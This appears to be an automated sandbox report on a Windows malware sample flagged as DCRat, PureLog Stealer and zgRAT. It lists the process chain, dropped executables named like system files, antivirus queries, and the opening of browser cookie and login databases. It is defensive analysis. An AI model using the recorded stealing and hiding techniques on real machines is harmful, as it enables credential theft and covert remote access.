Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597450
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 597266
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596734
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596625
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596488
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596359
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596188
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 596062
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595953
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595844
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595734
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595625
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595488
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595375
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595266
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595125
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 595013
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594906
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594786
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594666
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594562
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594441
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594304
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594203
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 594094
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593980
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593875
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593762
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593656
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593542
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593434
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593327
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593214
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593102
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 593000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592891
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592778
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592672
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592562
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 592453
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Thread delayed: delay time: 922337203685477
Source: C:\ServerfontSessiondhcpcommon\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\ServerfontSessiondhcpcommon\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\ServerfontSessiondhcpcommon\System.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: lHUOhgEtC1.30.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: lHUOhgEtC1.30.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: DC.exe, 00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp, DC.exe, 00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp, comReviewsvc.exe, 00000008.00000000.1654892379.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp, services.exe.8.dr, System.exe.8.dr, DC.exe.1.dr, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe0.8.dr, ApplicationFrameHost.exe.8.dr, comReviewsvc.exe.3.dr, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe.8.dr	Binary or memory string: yHc3ftk0CYgaHGFstfUY
Source: lHUOhgEtC1.30.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: DC.exe, 00000003.00000003.1420857359.00000000032A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: lHUOhgEtC1.30.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: lHUOhgEtC1.30.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: DC.exe, 00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp, DC.exe, 00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp, comReviewsvc.exe, 00000008.00000000.1654892379.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp, services.exe.8.dr, System.exe.8.dr, DC.exe.1.dr, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe0.8.dr, ApplicationFrameHost.exe.8.dr, comReviewsvc.exe.3.dr, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe.8.dr	Binary or memory string: FySKNaJgqEMutFPfYZo
Source: Dfim58cp4J.exe, 00000001.00000002.1438839433.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001B.00000002.1753849343.000002503D4B8000.00000004.00000020.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2601480273.000000001B9C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lHUOhgEtC1.30.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: lHUOhgEtC1.30.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: lHUOhgEtC1.30.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: lHUOhgEtC1.30.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: lHUOhgEtC1.30.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: wscript.exe, 00000004.00000003.1654003179.0000000003345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o
Source: lHUOhgEtC1.30.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: lHUOhgEtC1.30.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: lHUOhgEtC1.30.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: wscript.exe, 00000004.00000003.1654003179.0000000003345000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: lHUOhgEtC1.30.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: lHUOhgEtC1.30.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: lHUOhgEtC1.30.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: lHUOhgEtC1.30.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\AppData\Local\Temp\DC.exe

API call chain: ExitProcess graph end node

graph_3-23679

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BEF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00BEF838

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BF7DEE mov eax, dword ptr fs:[00000030h]

3_2_00BF7DEE

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BFC030 GetProcessHeap,

3_2_00BFC030

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Process token adjusted: Debug
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process token adjusted: Debug
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process token adjusted: Debug
Source: C:\ServerfontSessiondhcpcommon\System.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00BEF838
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEF9D5 SetUnhandledExceptionFilter,	3_2_00BEF9D5
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00BEFBCA
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BF8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00BF8EBD

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process created: C:\Users\user\AppData\Local\Temp\DC.exe "C:\Users\user\AppData\Local\Temp\DC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe "C:\ServerfontSessiondhcpcommon/comReviewsvc.exe"	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\ServerfontSessiondhcpcommon\System.exe "C:\ServerfontSessiondhcpcommon\System.exe"

Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"?","Crypto Extensions (fff5)":"?","Crypto Clients (fff5)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\java","7Y_D36 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7503 / -74.0014"]3[
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"?","Crypto Extensions (fff5)":"?","Crypto Clients (fff5)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","134349","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\java","7Y_D36 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7503 / -74.0014"]
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp^
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerX

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BEF654 cpuid

3_2_00BEF654

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

3_2_00BEAF0F

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Queries volume information: C:\Users\user\Desktop\Dfim58cp4J.exe VolumeInformation	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Queries volume information: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe VolumeInformation	Jump to behavior
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Queries volume information: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe VolumeInformation
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Queries volume information: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe VolumeInformation
Source: C:\ServerfontSessiondhcpcommon\System.exe	Queries volume information: C:\ServerfontSessiondhcpcommon\System.exe VolumeInformation
Source: C:\ServerfontSessiondhcpcommon\System.exe	Queries volume information: C:\ServerfontSessiondhcpcommon\System.exe VolumeInformation
Source: C:\ServerfontSessiondhcpcommon\System.exe	Queries volume information: C:\ServerfontSessiondhcpcommon\System.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BEDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

3_2_00BEDF1E

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BDB146 GetVersionExW,

3_2_00BDB146

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1687630200.00000000133DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: comReviewsvc.exe PID: 6544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe PID: 6196, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Dfim58cp4J.exe, type: SAMPLE
Source: Yara match	File source: 1.0.Dfim58cp4J.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DC.exe.55d570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DC.exe.55be70b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.comReviewsvc.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.1312124353.0000000000822000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1654892379.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\System.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DC.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 3.3.DC.exe.55d570b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.DC.exe.55be70b.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.comReviewsvc.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\System.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe, type: DROPPED
Source: Yara match	File source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\DC.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
